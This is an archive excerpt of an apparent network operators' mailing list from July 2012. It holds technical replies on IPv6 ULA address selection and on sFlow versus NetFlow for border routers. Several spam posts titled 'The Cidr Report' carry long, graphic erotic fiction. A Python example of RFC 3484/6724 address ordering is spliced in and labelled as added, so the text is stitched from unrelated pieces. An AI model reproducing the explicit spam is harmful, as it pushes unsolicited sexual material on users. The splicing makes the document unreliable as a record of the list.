Jack From jeroen at unfix.org Fri Jul 13 12:01:55 2012 From: jeroen at unfix.org (Jeroen Massar) Date: Fri, 13 Jul 2012 19:01:55 +0200 Subject: using "reserved" IPv6 space In-Reply-To: References: <500032E4.40804@gmail.com> Message-ID: <50005483.9000307@unfix.org> On 2012-07-13 18:11, Tom Cooper wrote: [..] > As an IPv6 newbie myself Play with it and get your ears wet, it is still not entirely too late to start to learn to swim ;) >, I wonder how hosts handle link local, ULA and > global addresses. > For example, if you have some internal web traffic used for intranet use > only, do you bind those servers to use only ULA addresses? This way your > internal users with ULA addressing only have access to those servers? No > need to give intranet-only servers a global address if they're not needed > to be accessed globally. You could do that indeed, thus have clients have only a global (and link-local address) and only make a certain prefix, be that ULA or a specific chunk of your global prefix only available to your internal network that are used for your internal services. As long as the prefix is stable you likely do not care if it is global or ULA, this as when a misconfiguration happens in such a way that that prefix is not properly firewalled away or gets routed it happened. As can be clearly seen in various routing tables filtering is not happening everywhere, thus it won't buy you that much; proper policy, automation and verification will avoid fat fingers much better though. Also, not that a firewalled prefix only brings one that much security, the higher chance is that the client host gets infected or compromised. > Is there a way for hosts to "prefer" or "attempt" to connect to a service > by first trying a link-local scope, then a ULA and finally a global address > if its off the AS? RFC3484, aka /etc/gai.conf and friends on other OSs. It is not easy to distribute this though. 
> I really like the idea of ULA and think it makes much more sense than > RFC1918 + NAT. I just don't have any deployment experience with it yet so > I'm curious how the host would handle it. ULA is meant for non-internet connected devices. As such NAT does not come into play as one will have a unique ULA prefix that will not clash when you inter connect them privately with other networks. RFC1918 + NAT primarily makes sense as it allows one to hookup devices to the Internet without 'wasting' more public addresses, that problem does not exist with IPv6 though. Greets, Jeroen From dhubbard at dino.hostasaurus.com Fri Jul 13 12:30:25 2012 From: dhubbard at dino.hostasaurus.com (David Hubbard) Date: Fri, 13 Jul 2012 13:30:25 -0400 Subject: Real world sflow vs netflow? Message-ID: Can anyone on or off list give me some real world thoughts on sflow vs netflow for border routers? (multi-homed, BGP, straight v4 & v6 only for web hosting, no mpls, vpns, vlans, etc.) Finding it hard to decipher the vendor version of the answer to that question. We use netflow v9 currently but are considering hardware that would be sflow. We don't use it for billing purposes, mostly for spotting malicious remote hosts doing things like scans, spotting traffic such as weird ports in use in either direction that warrant further investigation, watching for ddos/dos destinations to act on mitigation, or investigating the nature of unusual levels of traffic on switch ports that set off alarms. I'm concerned things like port scans, etc. won't be picked up by the NMS if fed by sflow due to the sampling nature, or similar concern if 500 ssh connections by the same remote host are sampled as 1 connection, etc. Of course these concerns were put in my head by someone interested in me continuing to use equipment that happens to output netflow data, hence me wanting some real people answers. :-) Thanks! 
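To make the RFC 3484 / gai.conf pointer in the "reserved IPv6 space" thread concrete, here is an added example (not code from anyone on the list): a simplified reimplementation of the destination-address sort a host performs, run for a constructed intranet client against an intranet server that publishes both a ULA and a global AAAA, under the RFC 3484 default table, the RFC 6724 default table, and a site-tuned table equivalent to a gai.conf precedence entry for the site's own ULA /48. The global prefix 2001:db8::/32 is the RFC 3849 documentation range and fd00:abcd:1234::/48 is a made-up ULA; the source-selection step is reduced to the three rules that matter for this case.

```python
# Added example: simplified RFC 3484 / RFC 6724 destination-address ordering.
# All prefixes and host addresses below are constructed for illustration.
from ipaddress import IPv6Address, IPv6Network

LINK_LOCAL, GLOBAL = 0x2, 0xE  # RFC 4291 scope values used by the sort

# Policy tables as (prefix, precedence, label); the longest matching prefix wins.
RFC3484_DEFAULT = [
    (IPv6Network("::1/128"), 50, 0),
    (IPv6Network("::/0"), 40, 1),
    (IPv6Network("2002::/16"), 30, 2),
    (IPv6Network("::/96"), 20, 3),
    (IPv6Network("::ffff:0:0/96"), 10, 4),
]
RFC6724_DEFAULT = [
    (IPv6Network("::1/128"), 50, 0),
    (IPv6Network("::/0"), 40, 1),
    (IPv6Network("::ffff:0:0/96"), 35, 4),
    (IPv6Network("2002::/16"), 30, 2),
    (IPv6Network("2001::/32"), 5, 5),
    (IPv6Network("fc00::/7"), 3, 13),       # ULA: low precedence by default
    (IPv6Network("::/96"), 1, 3),
    (IPv6Network("fec0::/10"), 1, 11),
    (IPv6Network("3ffe::/16"), 1, 12),
]
SITE_ULA = IPv6Network("fd00:abcd:1234::/48")   # constructed site ULA prefix
# Site-tuned table: what a gai.conf "precedence fd00:abcd:1234::/48 45" line would do.
SITE_TUNED = RFC6724_DEFAULT + [(SITE_ULA, 45, 13)]


def scope(addr):
    """Address scope per RFC 4291; note that ULA (fc00::/7) is *global* scope (RFC 4193)."""
    if addr.is_link_local or addr.is_loopback:
        return LINK_LOCAL
    if addr.is_multicast:
        return int(addr.exploded[3], 16)
    return GLOBAL


def policy(addr, table):
    """(precedence, label) of the longest matching row in the policy table."""
    _, prec, label = max((row for row in table if addr in row[0]),
                         key=lambda row: row[0].prefixlen)
    return prec, label


def common_prefix_len(a, b):
    """Length of the common leading bits of two IPv6 addresses."""
    return 128 - (int(a) ^ int(b)).bit_length()


def pick_source(dest, sources, table):
    """Simplified RFC 3484 section 5: matching scope, then matching label, then longest prefix."""
    return max(sources, key=lambda s: (scope(s) == scope(dest),
                                       policy(s, table)[1] == policy(dest, table)[1],
                                       common_prefix_len(s, dest)))


def order_destinations(dests, sources, table):
    """Simplified RFC 3484 section 6 (rules 2, 5, 6, 8, 9); ties keep the DNS order (rule 10)."""
    def key(d):
        s = pick_source(d, sources, table)
        d_prec, d_label = policy(d, table)
        return (scope(d) == scope(s),            # rule 2: prefer matching scope
                d_label == policy(s, table)[1],  # rule 5: prefer matching label
                d_prec,                          # rule 6: prefer higher precedence
                -scope(d),                       # rule 8: prefer smaller scope
                common_prefix_len(d, s))         # rule 9: longest matching prefix
    return [str(d) for d in sorted(dests, key=key, reverse=True)]  # stable sort


# Constructed client (link-local, ULA, global) and an intranet server whose
# AAAA answer lists the global address before the ULA one.
CLIENT_SOURCES = [IPv6Address("fe80::1"),
                  IPv6Address("fd00:abcd:1234:1::10"),
                  IPv6Address("2001:db8:1:1::10")]
INTRANET_AAAA = [IPv6Address("2001:db8:1:1::80"),
                 IPv6Address("fd00:abcd:1234:1::80")]


def preferred_destination(table):
    """The address the client would try first under the given policy table."""
    return order_destinations(INTRANET_AAAA, CLIENT_SOURCES, table)[0]


if __name__ == "__main__":
    for name, table in [("RFC 3484 defaults", RFC3484_DEFAULT),
                        ("RFC 6724 defaults", RFC6724_DEFAULT),
                        ("site-tuned table", SITE_TUNED)]:
        print(f"{name:18}: {order_destinations(INTRANET_AAAA, CLIENT_SOURCES, table)}")
```

Under both default tables the client does not prefer the ULA destination (the RFC 3484 table ties on every rule and falls back to DNS order; the RFC 6724 table ranks the global address above the ULA one), which is why the "prefer internal first" behaviour only appears once a tuned table is pushed to every host.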
From hugenog at rocketmail.com Fri Jul 13 12:41:52 2012 From: hugenog at rocketmail.com (HUGE NOG) Date: Fri, 13 Jul 2012 10:41:52 -0700 (PDT) Subject: The Cidr Report Message-ID: <1342201312.41321.YahooMailNeo@web140806.mail.bf1.yahoo.com> "What's wrong?" She asked, hearing the frustration in my voice. "It got bigger." I said. "What, your penis again?" She said, outside of the door. "Can I come in?" "Yeah, it's open." I said. My wife, Amanda, opened the door, peaking her head in. I smiled, because she looked so adorable peaking in like she was seeing a secret. I stood there, fully erect, with the tape measure in my hand. She smiled at me, then look at my penis. "Ugh, do you have to use the tape measure, we use that for the sewing. It's unsanitary." "It's easier to measure with this. Also it's the only way I can measure around. Besides, I wash it." I said. "You wash the tape measure?" She said, confused. I paused. "Yeah." "Right." She said. She then grabbed my penis, and examined it closely. "hm...It's hard for me to tell, I'm playing with it everyday. How big is it now?" "9.7 inches long, 6.3 around." I said. Holding my little notebook in my hand. "I really don't want to pass 10 inches..." My wife took it from my hand, and looked at it. "Wait, this says you were 9.2 inches long and 5.9 around?" "Yeah."I said. "That can't be right, you grew that much in just two weeks?" She said, confused. "Yes, it is. You helped me measure that time, remember?" I said. "Yeah, let me measure you now, you probably did it wrong." She said, taking the tape measure. She spun it around the shaft of my penis, in the middle. My shaft was oddly uniform, with no significant changes in girth up and down the shaft. "Ok yeah...you did mess up..." "What?" I asked. "You did make a mistake. You are just past 10 inches long...and 6.6 around" "God dammit, that's almost an inch longer in 2 weeks..." I said, frustrated. 
When I first realized I was growing, it was great and all, but now I was getting to a point where I was worried that it was causing my wife some discomfort. She would adapt usually, but the change in size would bother her sometimes. Whenever she would adapt, I would get bigger. I worried about the point when I would get too big for my petite wife. "I guess since it's your hands, it just made me harder." Amanda's face look the same as it did when I met her. She was 19, now she is 23. She had bright green eyes. She had small facial features, except for her big eyes. Her hair was pitch black, and she never dyed it. She was against that. She never wanted to fall too deeply into her appearance. Which she could easily do, because she had this natural beauty that radiated from her. Everything on her face was cute and well placed, from the freckles across her nose and checks, to the dimples she got only when she was mad. Amanda was 5'4", weighing a fit 115 lbs. She was very healthy, exercising daily and eating perfectly. She was thin and fit, with a well toned body, a full, awesome ass, and massive, perky, full 30 DD breasts. Her breasts seemingly defied gravity. Even though her body really has no impact on the size of the penis she could take (considering she can still handle my 10 incher), she was always tight down below. Even before I started growing, I needed a good amount of foreplay to even be able to fit my normal 6 incher in there. Now that I'm bigger, I need a lot more foreplay. "That doesn't make sense, how can you grow that much in just 2 weeks?" She asked. "I don't know, how can I grow from 6'2" to 6'6" in just 4 months? How can I gain almost 70 lbs, all of it muscle, in just 4 months, without working out? People constantly ask if I'm on steroids...not even body builders gain this much muscle this quickly. And look at my balls! If they get any bigger I'm not even gonna be able to walk correctly." I said. "I'm 25, I shouldn't be having such a big growth spurt." 
Amanda just smiled at me. "Tim, I don't understand how you are not liking this. I never thought a guy would be mad that he was getting taller, more muscular, and having a huge penis." "No, I do like it...it's just...I don't want to hurt you. I'm worried I'll get too big for you." I said. She snickered a bit. "Tim, I didn't marry you just because of your small penis. My ex was half your size when we got married, and I left him, didn't I?" I continued the joke. "He's so lucky, being so small. I wish I had a small cock." "Oh, I totally do to. So tiny I could barely feel it." She said, pretending to daydream. I laughed a bit. "I don't know...I just worry this might have some negative consequences." This whole time, Amanda was running her fingers up and down my long shaft. "I have to say, though, I do love how you can stay harder for much longer now." "Yeah..." I said. "And how much it stretches me..." I licked my lips as she slowly moved her face toward my penis, and licked up and down the shaft. "How it's so thick I can barely wrap my hand around it..." She said, and went back to licking and stroking my penis. "And how much you cum..."? She was right. Over the last 4 months, I've gained so much control over my erections, over the timing of my orgasms, the amount of orgasms I have, when and how much I cum. It's insane. Everyone else would love this. Why am I so frightened of this? I don't want to grow anymore. I want to be normal. Something in the back of my mind just makes me feel like this isn't right. That I need to do something. I was quickly distracted by this, as her hands and mouth felt amazing, running up and down my shaft. She was on her knees, and she quickly moved around the bathroom mats to ease the pain of her knees. Slowly, licking up and down my now massive shaft. After applying a good amount of saliva to my penis, she tried her best to stick my huge penis head in her mouth. She managed to, but couldn't open her jaw wide enough. 
Her teeth bothered me at first, but began to feel oddly nice as she used both of her tiny hands to stroke up and down my shaft. She pulled her mouth away. "I am sad that I can't deep throat you anymore..." She said, sticking her tongue out and tapping the tip of my penis with it slowly, and made a sexy smile up at me. She continued to stroke my penis with both her hands. Eventually, I grabbed her hand, and pulled her up. I pulled her against me, but facing away from me. My penis was on her right side, the difference in our height and the length of my penis brought it high enough for her to stroke it easily. I brought my left hand around, and put it down her pants, and began to stimulate her, as she stroked my penis. I bent down, and she put her head up, and we began kissing. She moaned softly. "God...even your fingers are big." She said, as I softly played between her legs. This continued for a few moments, as I waited for Amanda's breathing to increase. When this happened, I turned her toward me. Her pants had come off completely at this point, as we kissed. She eventually threw her shirt off, and I followed suite. I eventually picked her up, and we kissed. My penis was under her butt, seemingly holding her up. I made my way out of the bathroom, into the hallway, and put her back against the wall. To my right was the entrance to our house, and to my left was the living room. I lifted her up, and slowly put her onto my penis. I slowly pumped, picking up speed and going deeper and deeper into her, using her reactions and breathing to judge when the perfect moment would be. She was moaning softly. Amanda's reactions to sex, though, were never prominent. She was always quiet, and her face always had a calm, relaxed look on it, regardless of if we were just starting up, or if she was having mind blowing, insane, multi-orgasms that leave her unable to move. over the years I've known her, though, I've learned to find the subtle hints of her sexuality. 
Slowly, I took her off my penis, and set her on the ground. She walked over to a nearby table, and bent over it, sticking her perfect full ass up in the air. I felt like an animal, being lured over to a treat. I slowly stuck myself inside her again, and began going at it. It was passionate, as I slammed myself into her. The table was pounding into the wall and floor, her face and head kept accidently bumping into the wall. Each position goes on for some time. This last one seemed to be the most she could handle at the moment. I feel the very subtle quiver of Amanda's body, as she has an orgasm, and waves of fluid squirt onto my waist and groin. I continue, and only after a few seconds, she has another orgasm. This time, the quivering lasted for a good minute. She grabbed the end of the table with her hands as hard as she could, and bit her lip, as a third orgasm washed over her body. Her legs went limp, and then regained their stance, only to go limp again as an orgasm hit her again. Finally, she moved up, and I pulled out. "God...that was the best we've ever had." She said, and sat on the table. She grabbed my penis, and pulled it over closer to her. "Come on." She said, with a smile, stroking me. I looked over at the clock, seeing that we had been going at it for a good 2 hours. I couldn't help but shake this feeling that we were suppose to be somewhere... She stroked me faster and faster, and I nodded at her, letting her know I was about to cum. I shot my huge load, a massive string of semen flew out of my penis, striking her on the chest, and splashing elsewhere. This was followed by a 2nd, 3rd, and 4th. At this point, our door opened up, and Amanda's 2 friends, Rachel and Hannah, walked in. "Gah!" I said, confused, shooting another load. "Oh my God!" Rachel said. "What the...!" Hannah said, at the same time as Rachel. "Wah...I...guys! Knock!" Amanda said, jumping off the table. I know I should've just ran into the bathroom, which was 2 feet away. 
and had all my clothes in it. And had a door that could be easily closed. And a lock. And four walls to easily block the view of others. And is a room meant for doing private business. But I panicked. I backed up, and hit the wall behind me, shooting 2 more loads onto Amanda. I stumbled away from the girls, slipping on the juices me and my wife had left on the floor, falling to 1 knee, and shooting another load well into our living room. I got to my feet and quickly made my way into the living room and up the stairs, dribbling a lot of semen as I went, with my wife shouting at me. "What the...Tim stop!" She said, referring to how much I was cumming. The two women just stood in the doorway, Rachel with her hand over her mouth, trying to hide her smile, and Hannah looking sort of disgusted, but never looked away. "Dammit, I'm trying!" I said, stumbling up the stairs as quickly as possible. From hugenog at rocketmail.com Fri Jul 13 12:42:53 2012 From: hugenog at rocketmail.com (HUGE NOG) Date: Fri, 13 Jul 2012 10:42:53 -0700 (PDT) Subject: The Cidr Report In-Reply-To: <1342201312.41321.YahooMailNeo@web140806.mail.bf1.yahoo.com> References: <1342201312.41321.YahooMailNeo@web140806.mail.bf1.yahoo.com> Message-ID: <1342201373.41095.YahooMailNeo@web140806.mail.bf1.yahoo.com> It was 3 weeks after I passed the 10 inch mark. Our sex life was better than ever, even though I thought it would be the opposite. Amanda wanted sex several times a day. I never knew I was holding her back these years we were together. The fact that I have gained so much sexual power and stamina allows her to express her sexuality whenever she wanted it, and it was often. Luckily, this growth spurt happened after I got my job. It was a real good job, laid back. I could mostly work from home if I wanted, but I needed to establish myself, and went into the office often. Most importantly, I had great insurance, and was going to my first doctor's appointment today. 
I woke up to Amanda slowly rubbing her finger up and down my chest. "Morning, Mister Giant." She said, with a smile. Her subtle smirk that meant she wanted to have sex. "Hi." I said, groggily. "I glanced around the room for a second, then back at Amanda. "Sorry about the morning wood." I joked. "Ha, it just means you are ready." She said. I glanced down, and saw the penis head sticking way out of the waist band of my boxers. "Look, it's past your bellybutton." She said, poking my penis head. I sighed, frustrated. "I hate this." "Come on baby, you'll learn to like it. I did, right?" She said. "I'm past 11 inches..." I said, annoyed. "You could always do porn. I don't mind." She said, with a cute smile. I laughed a bit, and she looked disappointed for a second. "I really want to go at it...who could say they took an 11 incher? But I got class." She said, with a kiss, and hoped out of bed. Amanda was working at her Masters degree. "Are you gonna be home when I get back?" "Yeah, my doctor's appointment shouldn't take that long." I said, sitting up, watching her naked body strut to the bathroom. She knew she was turning me on. For a split second, she glanced at me just as she entered the bathroom, her smirk never leaving her face. She wanted to have sex so badly, and I felt bad for her. I just wanted to give her what she wanted. Luckily, she was more responsible than me, and knew when to say no. "You know," She called out from the bathroom. "I know it's been almost like, a month since the incident." She was referring to her friends, Rachel and Hannah, walking in on us having sex. "Rachel and Hannah have never stopped talking about how lucky I am." "Why's that?" I asked. "They seriously think you are the hottest guy ever." She explained. "Even before the growth, they always said you were attractive. But after seeing how big you are, they have been disappointed with every guy since." "Okay." I said, not sure what to say. 
I heard Amanda giggle a bit to my apathetic response. "Why do you bring this up?" "Oh, no reason." She said. I finally met my new doctor, and was a bit shocked. She looked like she was younger than me, but the degrees around her office proved that she was a professional. She was amazingly sexy. She wore her doctor's coat, but that did little to hide her massive breasts, easily more than double my wife's size. Her doctor's coat was open in the front, and her clothes were professional underneath, but her extremely wide hips and tiny waist were still clearly visible. She was easily 6'4", with short red red hair, and beautiful facial features. She could've easily become successful with just her looks alone, but her awards were too plentiful to be based solely on her appearance. Talk around the office was that she was an amazingly sexy Amazon, but too cold and professional to ever let anything happen. "You say only 5 months ago you were 6'2"?" She asked. "Yes a bit less than 5 months ago, and 180 lbs." I explained. "Now I'm passing 290 lbs, and..." "Yes, 6'7", I was there. I have to admit, it's funny that my nurse was unable to measure your height without my help." She said, and smiled. "Yeah...well, I'm 25, there is no reason I should be growing this fast..." I said. "This quick of a growth spurt isn't even common for young adults going through puberty." She said. "But I still need to complete this physical to send back to your offices." "I would prefer we didn't." I explained. "I'm...well. The growth spurt has impacted my...uh...genitals intensely as well." I said. "Well, I think that just justifies that I should examine you more." She said, coldly. "Um...I mean...I've been getting weird reactions from women lately..." I said. "Sir, I am a professional." She said, almost offended. "Now please." I sighed, and took off my pants. I expected a look of surprise, but she made more a look of confusion. "I apologize, I've just never seen such large testicles." She said. 
"Don't be surprised, I have to examine your testicles to see if this is a liquid build up or cancerous material." She explained, and she moved my 5 inch flaccid penis out of the way, and with her hands in gloves, she cupped my testicles. She slowly rubbed her hangs around my testicles, feeling for cancer or any other irregularities. "This is genuinely shocking. I didn't think human testicles were able to get this large." She explained, each the size of a jumbo egg. "Yeah, they were never this big, they just keep growing." I said. "And look how big my penis is." I said. "This size is normal." She said. "No, because it gets much bigger when it's...uh...erect." I said. "If you don't mind, could you get erect for me?" She said, again, coldly. She whipped off her glove to write something down, and put on a new one. "I...think that might be kinda hard for me to do." I said. "I'm kinda nervous at the moment." "This would help." In her cold way, my doctor quickly got down on her knees, and began tugging at my penis. "Ah...whoa, what are you doing." I said. "I know this seems awkward...but I really...must examine you erect." She said. I was confused, as her cold demeanor slowly left her voice. Little by little, she tugged and stimulated with her gloves hands. Even though her shirt was conservative, her breasts were so large, it was hard to hide the cleavage. I quickly grew erect. Inch by inch, it kept swelling. "Oh my..." She said, watching it grow toward her face. Confused, she backed away, but it kept growing toward her. "This is...how big was it before your growth spurt?" "I'm not sure...I think around 6 inches." I said, as it reached it's full, 11 by 7 erect status. She bites her lower lip, catches herself doing so, and quickly stops. Slowly, she moves her hands up and down my shaft, examining it. "Uh...Doctor?" She ignored me, almost hypnotized by my massive member. 
It started as her squeezing random parts, looking for something irregular, but over time, she began to simply stimulate me. "Doctor?" I said. She still didn't respond. It took all the will power in my being to turn away from her. "Doctor!" I said, louder. She snapped out of it, and looked up at me. "Oh my God..." She said, and stood up, and faced away from me. "Oh my God I'm so sorry I've never acted like this before." "It's alright." I said, in a low volume, but annoyed voice. I would give anything to tear this women apart, but I just kept Amanda's face in my mind. I struggled to put on my clothes with my giant erection still up. I managed to force my erection to the side, almost wrapping around to the side of my hip. "I am so sorry sir, I apologize. Oh God I can't believe this." She said. "I understand if you want to switch services. I'm so sorry." "Look, is everything okay?" I asked. "Huh? Oh yes, I have found nothing cancerous. I will transfer these records to another doctor if you want to go with someone else. Just get a checkup again in a few weeks, and we will compare the results. Some tests will get taken. Again, I am so sorry, I am usually very professional." She said, really quickly. My erection still at full force, I said goodbye to the doctor, and left the office. On my way out, it was like slow motion, everyone was staring in awe at my giant penis, stretching my pants. I quickly walked to my car, and sat in. My erection was painful, restricted by my jeans, which were small as my lower body added muscle and mass over the weeks. As I drove, the pain kept building. I undid my pants, and my erection sprang upward, still full and strong. "Dammit." I said, frustrated. This was the first time in my life I wished I had a bigger car, instead of my small efficient one. I just made to make sure I kept moving, any car next to me would easily see my giant erection. I managed to make it to the stoplight right before my home without an incident. 
I did my best to hide my erection, when a truck pulled up next to me. I was busy trying to hide it to notice, but when I finally looked over, I saw a car full of beautiful sorority girls, at least 3 of them looking, with the driver attempting to look. "Holy shit that is huge!" The girl in the passenger seat said. "Hey there!" The one in the backseat said. "Let me see, how big is it?" One shouted from the backseat. "Seriously, this guy is bigger than Brad!" The one in the front said. "I wanna see! Is he cute! Invite him over!" Oh God, I had to get out of here. "Hey, you should come to our sorority house. We'll give that giant thing the night it deserves!" "Uh...sorry, I'm married." I said, trying to tuck my penis in my shirt, angry that I didn't think of that before. "Oh...he's really buff too." "He's married though." At the same time, all the girls said "Aww..." A piece of paper landed on my lap. "If you ever leave your wife, call me!" She said. "Or if not...whatever!" The light turned green, and I quickly sped off. I finally made it home, and sat on my bed, masturbating furiously. I was going at it for a good hour, having orgasm after orgasm, and my erection wouldn't subside. Having so many beautiful girls hit on me was too much.? When Amanda finally got home 4 hours later, I beat the record, giving her 8 orgasms during the span of that day. From hugenog at rocketmail.com Fri Jul 13 12:43:27 2012 From: hugenog at rocketmail.com (HUGE NOG) Date: Fri, 13 Jul 2012 10:43:27 -0700 (PDT) Subject: The Cidr Report In-Reply-To: <1342201373.41095.YahooMailNeo@web140806.mail.bf1.yahoo.com> References: <1342201312.41321.YahooMailNeo@web140806.mail.bf1.yahoo.com> <1342201373.41095.YahooMailNeo@web140806.mail.bf1.yahoo.com> Message-ID: <1342201407.17705.YahooMailNeo@web140802.mail.bf1.yahoo.com> A week later, I kept watching my body, examining every detail. 
I was annoyed that my doctor came onto me, but she was the only one I could use to reference my body size, and I wanted this to stop as soon as possible. Amanda, though, seemed unphased when I told her the story of what happened. She said she couldn't blame the doctor, because I am the hottest man alive. I was slightly annoyed by this. I wanted to be devoted to my wife, the love of my life, and she didn't even care. This was different. I remember when she told me she would "...rip your balls off and stick them so far up your ass that they would come out of yours eyes." if she ever caught me cheating. She was joking...but I could tell that she was deadly serious about cheating. Now, she is...almost encouraging me to cheat. I was more surprised, when after 5 hours of sex that night, she made an odd suggestion. "So...remember how I said Rachel and Hannah couldn't stop talking about you?" Amanda asked me. "What? I thought you said they only said I was hot or whatever." "Yeah, but they always say it." She said, giving me a peck on the nose. "They...they kinda beg me to let them have some of you." She said. "What?" I was a bit confused. Rachel and Hannah were very attractive girls. They were high school friends with Amanda, and were just as fit as her. Rachel was tall, 6'1". She was small chested, but built like a fitness super model. She had thick, muscular legs, and the best ass I've ever seen. Her stomach had a significant outline of abs, and her shoulders were broad. her arms were defined, as she did weight lift often. She wasn't bulky or manly, but very fit. She was blonde, with green eyes.? Hannah, on the other hand, was exotic looking. She was 5'5", and just as fit as Rachel and Amanda, except more built. She was half Arabic, and had dark skin, hair, and eyes. She was a C cup, with an amazing ass, and very wide hips. This looked amazing on her very small waist. "I really want them here, with us." Amanda said, completely sincere. 
"I was kinda scared of your reaction..." "Wait, you want me to have sex with them?" I asked, confused. "Well, I want all 3 of us with you, here. In our bed." She said. I shook my head. "Our bed!?" I felt like something sacred was being defiled. Am I the only guy...no, only person, who felt that sex had any special connection to it? "Sex isn't something that should just be thrown around to anyone, Amanda! I Love YOU. Not Rachel, not Hannah, not that fucking doctor. You!" "I know that!" She said, annoyed that it seemed like I was accusing her of not loving me. "But this isn't something that is permanent. We're young! We should have a bit of fun for a while, you know? Maybe play around now, and then you can devote yourself to me." She suggested. "I..." I took a deep breath. This was making me incredibly sad. "You told me yourself, You've only been with 1 girl before me, right?" "Ya..." I said. "So you are gonna go your whole life, with only 2 women, and think that will be enough for you?" "Are you cheating on me?" I asked. "What?!" "Why else would you be trying to get me to be with other women? You are trying to soften the blow!?" I said. "Ew! I would never cheat on you, you asshole!" She shouted, and got out of bed. "I'm giving you an offer. If I wanted to have sex with another guy, I would fucking ask." She said, angry, as she began to put on her clothes. "This doesn't make sense, Amanda. you've never acted like this. Now that I'm huge, you want to share me?" I said. "My body has changed the way you look at me." "No you idiot. I changed. I'm different. Everyone changes Tim. I'm willing to keep things the way they are. But I'm more open about changing them. The only thing that changed is that I want to try new things. That's it." She explained. "Stop assuming things. I just want to have fun. If you don't wanna, that's fine. And I'm asking you now, do you want to do this?" She said. I paused. 3 incredibly sexy women, all focused on me? Amanda really wanted to do this. 
From jeroen at unfix.org Fri Jul 13 12:44:54 2012
From: jeroen at unfix.org (Jeroen Massar)
Date: Fri, 13 Jul 2012 19:44:54 +0200
Subject: Real world sflow vs netflow?
In-Reply-To:
References:
Message-ID: <50005E96.9010701@unfix.org>

On 2012-07-13 19:30, David Hubbard wrote:
[..]
> We don't use it for billing purposes, mostly for spotting malicious
> remote hosts doing things like scans, spotting traffic such as weird
> ports in use in either direction that warrant further investigation,
[..]

The primary difference between NetFlow/IPFIX and sFlow is that NetFlow is unsampled while sFlow is sampled. As such, for these kinds of cases it might be more worthwhile to have NetFlow than sFlow, as you get all the source/dest ports.

On the other hand, sFlow can give you packet headers, and that might be useful if you get, say, the first 200 bytes of every flow. Though depending on the hardware, traffic volume and traffic mix, you might have to sample anyway.

Oh, and there is a small difference in the packet formats and the idea behind why something exists, but that won't hurt you too much.

Greets,
Jeroen
"I need to go to the doctor..." I said, sitting up. Amanda's voice seemingly healed me. I slowly made it to my feet. I shook my head... "Tim...you...did you grow?" She said. "Your muscles are...massive." She said, in awe. There was a silence for a few moments, and she slowly stepped back, and grabbed her keys. When she came back, the door was closed. "Tim..." She said, a bit confused. I walked toward her. "Do you still wanna go?" She asked. "Not yet." I said. I picked grabbed her waist, and threw her over my shoulder with one hand. She laughed. "Tim!" She said, excited. She began to feign helplessness. "No, please, don't take me to your evil, well furnished bedroom and have your way with me!" She joked, and I walked upstairs with her. I threw her on the bed, and she bounced. She laughed again. "Tim, I've never seen you like this..." She said. I grabbed her shirt and bra at the same time with one of my massive hands, and pulled them off of her in one quick motion, and she gasped, and sighed softly. "Tim...this is really hot..." She said, as I grabbed her by the belt, and picked her up off the bed. I held her against my chest and we began to kiss. I grabbed her pants on both sides of her hips, and pulled them apart, ripping them right off her. She was already wet, as she ground her hips into me over her thong. I dropped her on the bed again, and she landed on her butt. She quickly spun around, and leaned over the bed, ready to go at it from behind. I easily ripped off her thong. Slowly, I began to plunge myself into her. I was having trouble, trying to keep myself low enough to penetrate her because of our height differences, but I managed. "Oh...Tim...you are so big..." She said. "I can't wait until I'm as big as you." I stopped. She looked back at me with a confused look on her face. "What did you say?" "Huh? I didn't say anything." She said. I should've interrogated her, but I couldn't. I just went back to giving it to her. 
"I thought you said...you were gonna get as big as me." "What?" She said. I began to notice a distortion. Something was different. I couldn't figure it out. "That's what it sounded like." I said. "Ooooh....that would be awesome. Imagine if I was growing with you, Tim." She said, always looking away from me. I set my hand on her waist. "At least...I wouldn't be alone." I panted. "You aren't alone...you just...stand out more." She panted back. "But imagine...me growing bigger..." She said. I didn't. I refused. I just focused on her body, how good this all felt. "I guess if you...didn't mind." "Oh...I would...love it." She said. Oh God. She was growing. I could see it. I watched her back slowly lengthen. "Oh God..." I said. "If I grew taller..." Her legs lengthened, her butt slowly rising higher and higher. "I don't understand, Amanda...how..." "Curvier..." Her chest was touching the bed, and I began to see her side boob slowly moving out to the side as her breasts enlarged. "...how is this happening?" I asked. "Oh...I'd be so much stronger..." Her body remained in it's incredibly fit shape, but there was just more and more. My hands were on the sides of her hips, as I felt her ass expand in my hands. She began to prop herself up on her arms, her legs too long to allow her to just lean over the bed. "Amanda...you are growing...right now..." I said, unable to stop having sex with her. "...how many heads I'd turn just walking down the street..." She continued to grow, quickly, in front of my eyes, I saw it happening. I felt it. This had to be real. How was this happening? "A-Amanda...I'm..." "I'd...be...a....goddess...." She said, as we both had the most intense orgasms of our lives. I unleashed load after load after load, more than I had ever done before. For a good 10 minutes, she was unable to move, as she shivered and grabbed the blankets below her, in a perpetual state of orgasm. I stepped back, as I finished unleashing my load. 
She felt to the ground without my support. She must've been as tall as I was. Her legs were thick with muscle, but perfect, without a blemish. Her butt lifted her body off the ground. It was an amazing contrast in relation to her waist, which was seemingly unchanged. Her breasts were absolutely massive, hanging off to her sides, easy breast the size of a basketball. She shoulders were broad, and her head remained relatively the same size, making her body look all the more massive. She was lost in climax. It looked like she was having a seizure. "Amanda...are you...ok?" I asked. "I...oooohhhh..." She managed to say, as she curled up slightly, then uncurled again. "...keep...cummminnnnggggg...." She said, quaking and shaking with delight, the smile never leaving her face. I looked at her amazing body in awe, but still had this fear in the back of my mind. I took a deep breath, and closed my eyes. When I opened them, she was in the same position, but back to normal. I waited until her orgasms finally ends. "Amanda..." "Huh?" She said, opening her eyes, looking up at me. "I think we should go to the hospital..." From shortdudey123 at gmail.com Fri Jul 13 12:46:06 2012 From: shortdudey123 at gmail.com (Grant Ridder) Date: Fri, 13 Jul 2012 12:46:06 -0500 Subject: The Cidr Report In-Reply-To: <1342201439.60327.YahooMailNeo@web140806.mail.bf1.yahoo.com> References: <1342201312.41321.YahooMailNeo@web140806.mail.bf1.yahoo.com> <1342201373.41095.YahooMailNeo@web140806.mail.bf1.yahoo.com> <1342201407.17705.YahooMailNeo@web140802.mail.bf1.yahoo.com> <1342201439.60327.YahooMailNeo@web140806.mail.bf1.yahoo.com> Message-ID: if the admins are not going to moderate this list... give me the admin password to the list serve and i will set it up right... 
gees
